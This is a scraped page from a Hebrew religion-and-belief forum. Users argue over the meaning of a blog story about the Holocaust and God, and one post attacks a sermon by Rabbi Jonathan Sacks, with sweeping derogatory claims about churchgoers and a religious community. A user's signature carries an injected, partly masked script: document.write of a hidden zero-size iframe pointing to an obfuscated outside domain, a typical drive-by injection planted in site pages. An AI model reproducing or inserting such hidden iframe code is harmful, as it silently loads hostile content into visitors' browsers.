שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");


דדווח על תוכן פוגעני

מחובר
נשלח ב-17/4/2018 13:32 לינק ישיר 

מיימוני, כנראה שלא הבנת שמשה רט מגלה את הסוד בתוך הפוסט עצמו.  הנה הציטוט מתוך הפוסט. (ההסברים שלי באותיות גדולות)

" ג'ק רכן לעבר אלתיאה ולחש באוזנה. עיניה התרחבו. "וואו, באמת?" אמרה. "זה נשמע הגיוני... אבל בחיים לא הייתי חושבת על זה".

כאן מתחיל הסוד (איש הקש)

"את מבינה", הוא אמר. "אפילו את לא היית חושבת על זה, אבל בני אדם חושבים שאם הם לא הצליחו למצוא הסבר הגיוני לשואה, אז זה מוכיח שאין אלוקים. יוהרה כה גדולה ביצורים כה קטנים".

הנה איש הקש. משה רט ממציא טענה שאיננה קימת אצל אנשים חושבים. אתאיסטים לא מחפשים בשואה הוכחה כל שהיא . השואה לא מוכיחה כלום לא למאמינים ולא לאתאיסטים. כפי שהסברתי בפוסט הקודם. ולכן אין כאן יוהרה של אנשים קטנים אלא טיפשות של משה רט וכל אלה שנותנים לו לייק.

אלתיאה שתקה לרגע. "בכל מקרה, ברור שאי אפשר לגלות להם את התשובה הזו", אמרה.

אם לא הבנת,מיימוני, פה הוא מגלה לה את הסוד (מה שנקרא סוד גלוי):


"ברור", אמר ג'ק. "ובינינו, הם גם לא באמת רוצים לדעת. הם מעדיפים את הפוזה המיוסרת של איוב המטיח דברים כלפי מעלה על פני קבלת תשובה הגיונית שתסתום להם את הפה".

הנה הסוד: פוזה מיוסרת של אתאיסטים. והשאלה שלי על איזה פוזה מיוסרת הוא מדבר? פוזה מיוסרת? מי מיוסר? האתאיסטים שמאמינים שמדובר בעצם בכוס התה של ראסל? או האתאיסטים שמאמינים באיטריה שמעופפת בין הגלקסיות? ברור שמי שלא מאמין לא מתיסר ביסורי שווא.


"אולי אתה צודק", נאנחה אלתיאה.


אלתיאה (בויקיפדיה היא מתוארת כעיוורת אבל לא כטיפשה )אכן צריכה להאנח בגלל  שמשה רט הופך אותה לנציגה  של הטיפשות שלו.דדווח על תוכן פוגעני

מחובר
נשלח ב-18/4/2018 01:45 לינק ישיר 

אפרים

תודה על טרחתך.

לצערי לא הבנתי.

א. עדיין איני יודע מיהי אלתיאה שזכתה להופיע בויקיפדיה. זה הערך? רק לעשות חיפוש שם על השם הזה?

ב. במקום שכתבת שהוא מגלה את הסוד אזי אני לא הצלחתי לפענח. בעיני זה להפך. יש שם סוד שהוא לוחש לה, ואומר אבל הם מעדיפים פוזה מיוסרת. הם לא ירצו לשמוע את הסוד.

והסוד הוא...?

מתוך הסיפור ניתן לדייק, אם אפשר לדייק אצל מ. ר., שיש שם איזה שהוא סוד. איזה שהוא הסבר. ולפי מה שאני מכיר אותו ואת רעיונותיו, מסתבר שהוא דואליסט, מאמין במאבק בין טוב לרע, משהו קבליסטי דואליסטי שלמעשה כבר מופיע, עם פחות מורכבות בספירות, אצל זורואסטר ודרכו.

_________________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");
דדווח על תוכן פוגעני

מנותק
נשלח ב-18/4/2018 10:20 לינק ישיר 

אלתיאה שתקה לרגע. "בכל מקרה, ברור שאי אפשר לגלות להם את התשובה הזו"

מיימוני, בפירוש נאמר שהתשובה הזו היא  הסוד. (אלתיאה  אומרת "שאי אפשר לגלות להם את התשובה הזו" כלומר התשובה הזאת היא הסוד.)

וכל מה שכתבת בגלל אי ההבנה שלך את הפוסט על דואליזם, מאבק בין טוב לרע ,זרתוסתרא -זאת המצאה שלך. אם היית מביא הוכחה לדבריך  זה היה נשמע רציני יותר.
דדווח על תוכן פוגעני

מחובר
נשלח ב-24/8/2018 14:01 לינק ישיר 

באשכול אחר  ( כי תצא) הביא ספרן את דרשתו הרב יונתן זקס הנוגע לשאלה האם דתיים עוזרים יותר? (התשובה שלו:לא בטוח)www.israelhayom.co.il/article/581831
מה שמדהים בדרשה הזאת שהרב זקס עוסק בזוטות ומתעלם מעובדות הרבה יותר כלליות ורציניות שמוכיחות שדת איננה ערובה למוסר. (ברוב המקרים העובדות מוכיחות ההפך.)

אתן רק שתי דוגמאות בולטות:
1.בארה"ב ,ארץ דתית ביותר ,סביר הרבה יותר להניח שבתוך הכנסיה ימצאו הרבה יותר פדופילים מאשר מחוצה לה.


2.בישראל ציבור ענק של אנשים מתעלם מהצרכים הביטחוניים של ישראל ומטעמים דתיים משתמט מלסייע  ונותן לאנשים אחרים למות במקומם.

בד"כ אותו ציבור מתנהג "בחסידות" יתרה רק עם חבריו . וכבר ידוע מדוע החסידה נחשבת לעוף טמא.. בדיוק בגלל זה.דדווח על תוכן פוגעני

מחובר
   
בית > פורומים > דת ואמונה > עצור כאן חושבים > דרשנים, היזהרו בדרשותיכם
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 9 10 11 לדף הבא סך הכל 11 דפים.